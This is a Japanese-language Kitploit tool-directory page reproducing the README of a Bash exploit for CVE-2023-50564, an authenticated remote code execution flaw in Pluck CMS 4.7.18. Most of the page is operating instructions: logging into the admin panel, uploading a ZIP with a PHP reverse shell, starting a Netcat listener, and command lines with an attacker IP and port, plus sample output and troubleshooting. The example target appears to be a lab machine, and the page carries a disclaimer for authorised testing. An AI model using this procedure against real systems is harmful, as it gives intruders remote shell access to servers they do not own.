Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

CVE-2023-50564のBashエクスプロイト。悪意のあるZIPアップロードを介してPluck CMS 4.7.18で認証済みリモートコード実行を自動化し、PHPリバースシェルをトリガーします。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-50564 - Pluck CMS v4.7.18 リモートコード実行 (RCE) エクスプロイト

説明

このスクリプトは Pluck CMS v4.7.18 のリモートコード実行 (RCE) 脆弱性を悪用します。この脆弱性により、悪意のあるユーザーが悪意のある PHP ファイルをサーバーにアップロードして実行し、ターゲットマシン上でリモートコマンド実行を獲得できます。

スクリプトは以下の全プロセスを自動化します:

  1. 提供された認証情報を使用して Pluck CMS 管理パネルに認証します。
  2. 悪意のあるリバースシェル PHP スクリプトを含む ZIP ファイルをアップロードします。
  3. PHP リバースシェルを実行し、攻撃者がターゲットマシンへのリモートアクセスを獲得します。

注: スクリプトは攻撃者側のマシンでリバースシェルを受信するための Netcat リスナーが必要です。


前提条件

スクリプトを実行する前に、以下を確認してください:

  • Netcat がインストールされており、リバースシェルを受信するためのリスナーが設定されていること。
  • 正しいターゲット ホスト、パスワード、IP アドレス、およびリバースシェル用の ポート を持っていること。
  • ターゲット上の Pluck CMS 管理パネルにアクセスできること。

使い方

root@kitploit:~
./CVE-2023-50564 -h <ホスト> -P <パスワード> -i <IP> -p <ポート>

引数:

  • -h <ホスト>: ターゲットホスト (例: greenhorn.htb)
  • -P <パスワード>: Pluck CMS 管理パネルのパスワード (例: abcd123)
  • -i <IP>: リバースシェルを受信する攻撃者の IP アドレス
  • -p <ポート>: Netcat リスナーがリバースシェルを受信するために待機しているポート

例:

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

手順:

  1. Netcat リスナーのセットアップ: 攻撃者側のマシンで、指定したポートで Netcat リスナーを起動します:

    root@kitploit:~
    nc -nvlp <ポート>
    

    例:

    root@kitploit:~
    nc -nvlp 9001
    
  2. スクリプトの実行: ホスト、パスワード、IP アドレス、ポートを含む必要なパラメータをスクリプトに渡します。

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. スクリプトの実行:

    • スクリプトは Pluck CMS 管理パネルにログインします。
    • リバースシェル PHP スクリプト (love.php) を含む ZIP ファイルをアップロードします。
    • ZIP ファイルがアップロードされると、ターゲット上でリバースシェルが実行され、あなたの Netcat リスナーへの接続が確立されます。
    • クリーンなメッセージが表示されます: "RCE is waiting for you, please go take a look." そして、スクリプトは経過時間を記録して終了します。
  4. ターゲットへのアクセス: リバースシェルがトリガーされると、Netcat リスナーに接続が表示され、ターゲットマシンへのリモートアクセスが得られます。


POC

image

出力例

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

必要条件

  • cURL: Pluck CMS とのやり取りやファイルアップロードに使用します。
  • Netcat: リバースシェルを待ち受けるために使用します。

これらのツールがインストールされていない場合は、以下のコマンドでインストールできます:

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

root@kitploit:~
sudo yum install curl nc

免責事項

このスクリプトは教育目的および許可されたペネトレーションテスト目的のみを意図しています。許可なくこのスクリプトを使用することは違法であり、非倫理的です。システム上の脆弱性を悪用する前に、必ず適切な許可を取得してください。


トラブルシューティング

  1. 504 Gateway Time-out: リバースシェルの実行を試みる際にこのエラーが発生する場合がありますが、シェルの実行成功には影響しません。このエラーは通常、ターゲットサーバーが HTTP リクエストへの応答に時間がかかりすぎることが原因ですが、シェルは正常に動作するはずです。

  2. Netcat リスナーの問題: リバースシェルを受信できない場合は、IP アドレスとポートが正しく設定されていること、およびターゲットがあなたのマシンに接続するのを妨げるファイアウォールの制限がないことを確認してください。

  3. ログイン失敗: CMS 管理パネルへのログインが失敗する場合は、入力したパスワードが正しいか、ターゲットマシン上で CMS にアクセス可能かどうかを確認してください。


README にさらなるカスタマイズや明確化が必要な場合はお知らせください。

ツールをダウンロード